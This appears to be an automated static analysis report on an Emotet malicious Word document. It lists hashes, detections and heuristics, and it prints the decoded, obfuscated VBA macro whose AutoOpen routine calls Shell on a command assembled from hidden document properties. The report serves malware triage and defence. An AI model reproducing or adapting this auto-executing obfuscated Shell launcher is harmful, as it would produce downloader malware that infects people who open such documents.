Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c77d0bee9502f8d4…

MALICIOUS

Office (OLE)

59.0 KB Created: 2017-09-27 07:21:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: 0771a7a8ac18f4c8357fb6bdf36502bf SHA-1: 922f099077d3ea4e9f7586b76106d15d3eb3cad7 SHA-256: c77d0bee9502f8d4c3afc1729a7ab9721ffce9bf2b7759d086e436370af4ff5c
172 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros, identified by ClamAV as Doc.Downloader.Emotet-6344335-3. The VBA code includes a potential Shell call and is obfuscated, indicating an attempt to download and execute a second-stage payload. The presence of legacy WordBasic auto-exec markers further supports this malicious intent.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    mEMTfaBzpVD = "CYnwfvFP" + "UdfnbhtTDS" + "WDXbvaxpT" + "gVHhSGstnFW" + "yemRbdNY" + "NTPwktebnX" + "RwZfkEyEMXM" + mrvycuPmBm = "LrkKzpCVt" + "TpxpmTBW" + "hRERSmUp" + "vGKEvEYKkmd" + "PPVzuHUCxA" + "pYUKsHYgax" + "VpcGVhtWe" + "xCCDpEPrh"
    VBA.Shell$ "" + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + xFKxYCDC + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + AmyPYDp, 0
    xfdCdczZ = "RuFWgEBcTe" + "GPZFxrUX" + "hebyXbMssY" + "RZdyNdwv" + "cvNLLyFg" + "ukNnGmbCGM" + "CChGSZdf" + xxPxYrr = "gFYcNdhXme" + "ManuuEtw" + "CpADHDyfMxg" + "RRUmZaNLuPv" + "VevAELxMtHd" + "hacXDDDgw" + "xTMSgYLxazb" + rApRdZHtwW = "wmXvGtzgTg" + "XKgUNFbbbX" + "EBNpVZySWge" + "TeHmtaGLvC" + "GtUpEvPVcdP" + "GNrvpZus" + "DFnxgRPu" + SKMueWtAd = "XSVxdtS" + "UmdSgkZVtZN" + "ufsKrXf" + "PtgppNbYT" + "FWaCaKvtV" + "bXtRcCgr" + "mZdXPNXKeV" + VbbChFHRC = "wTuxzFYsevH" + "xHsyGRNe" + "BEepzms" + …
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub autoopen()
    avRataMpFRC
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3003 bytes
SHA-256: 4c8d7a16f384e2b161ddcdcc5058369fa436ee0612f5cc00aef2774370885fb1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
106 of 138 identifiers look randomly generated (e.g. 'xTMSgYLxazb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function avRataMpFRC()
TaHMMxHwFE = "ybuNnMGBAX" + "CPwTvHgyp" + "mshMdfsBk" + "tvhDaPmHpk" + "YZXZCHMAwzc" + "rDtVBuduH" + "ArxzVBPYS" + mCRxxtWaE = "dmmEuuHUeHK" + "GrmkbtUKp" + "snZuHxrE" + "VVsdnDXmF" + "kURhZefH" + "SLywUry" + "AcMDGpF" + hKWhZPsZFx = "xLGvXGv" + "pskDxkTmBV" + "uTbbfgRNTPp" + "uSmHGcDxsdV" + "fCyKcDRzf" + "kBkmstwuFr" + "fwFHdhtFSp" + fcRDfxC = "KmNBuSRWT" + "MzNCPgAVZ" + "BPDeGrTadp" + "kVHAxpzTfHE" + "hsUcMPy" + "zpERKkLssE" + "eEZSzbLCvB" + wRXEuHwexzh = "gEngfnGgENc" + "bcaYtBcgxa" + "GdVXgZUTRZ" + "WyehXcst" + "RypDaxSRxY" + "UwmgNTz" + "wVubsYrCVGR" + "XuSWdxMS"
xFKxYCDC = "" + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + ActiveDocument.CustomDocumentProperties("SkccLKNpG") + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + ActiveDocument.CustomDocumentProperties("WrZrkCYpkK") + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + ActiveDocument.BuiltInDocumentProperties("Comments") + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + PsVuDKrMF
mEMTfaBzpVD = "CYnwfvFP" + "UdfnbhtTDS" + "WDXbvaxpT" + "gVHhSGstnFW" + "yemRbdNY" + "NTPwktebnX" + "RwZfkEyEMXM" + mrvycuPmBm = "LrkKzpCVt" + "TpxpmTBW" + "hRERSmUp" + "vGKEvEYKkmd" + "PPVzuHUCxA" + "pYUKsHYgax" + "VpcGVhtWe" + "xCCDpEPrh"
VBA.Shell$ "" + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + xFKxYCDC + CeeTuCYP + eYNrpsGU + tESaByN + FgvLuaXc + EXfzSBXF + GWcWTPm + mgYSYuNaLDm + SbhFWZnvW + ZDAMxaDZ + vtzCbyMfF + LHheUsCVRwc + AbrayUrCT + GYEuyVDeUg + HbUgeGanth + AmyPYDp, 0
xfdCdczZ = "RuFWgEBcTe" + "GPZFxrUX" + "hebyXbMssY" + "RZdyNdwv" + "cvNLLyFg" + "ukNnGmbCGM" + "CChGSZdf" + xxPxYrr = "gFYcNdhXme" + "ManuuEtw" + "CpADHDyfMxg" + "RRUmZaNLuPv" + "VevAELxMtHd" + "hacXDDDgw" + "xTMSgYLxazb" + rApRdZHtwW = "wmXvGtzgTg" + "XKgUNFbbbX" + "EBNpVZySWge" + "TeHmtaGLvC" + "GtUpEvPVcdP" + "GNrvpZus" + "DFnxgRPu" + SKMueWtAd = "XSVxdtS" + "UmdSgkZVtZN" + "ufsKrXf" + "PtgppNbYT" + "FWaCaKvtV" + "bXtRcCgr" + "mZdXPNXKeV" + VbbChFHRC = "wTuxzFYsevH" + "xHsyGRNe" + "BEepzms" + "reHSKpWf" + "bckZzyrG" + "GCyEtDvghRS" + "vBpFVHUHZT" + "SbbGRSA"
End Function
Sub autoopen()
avRataMpFRC
End Sub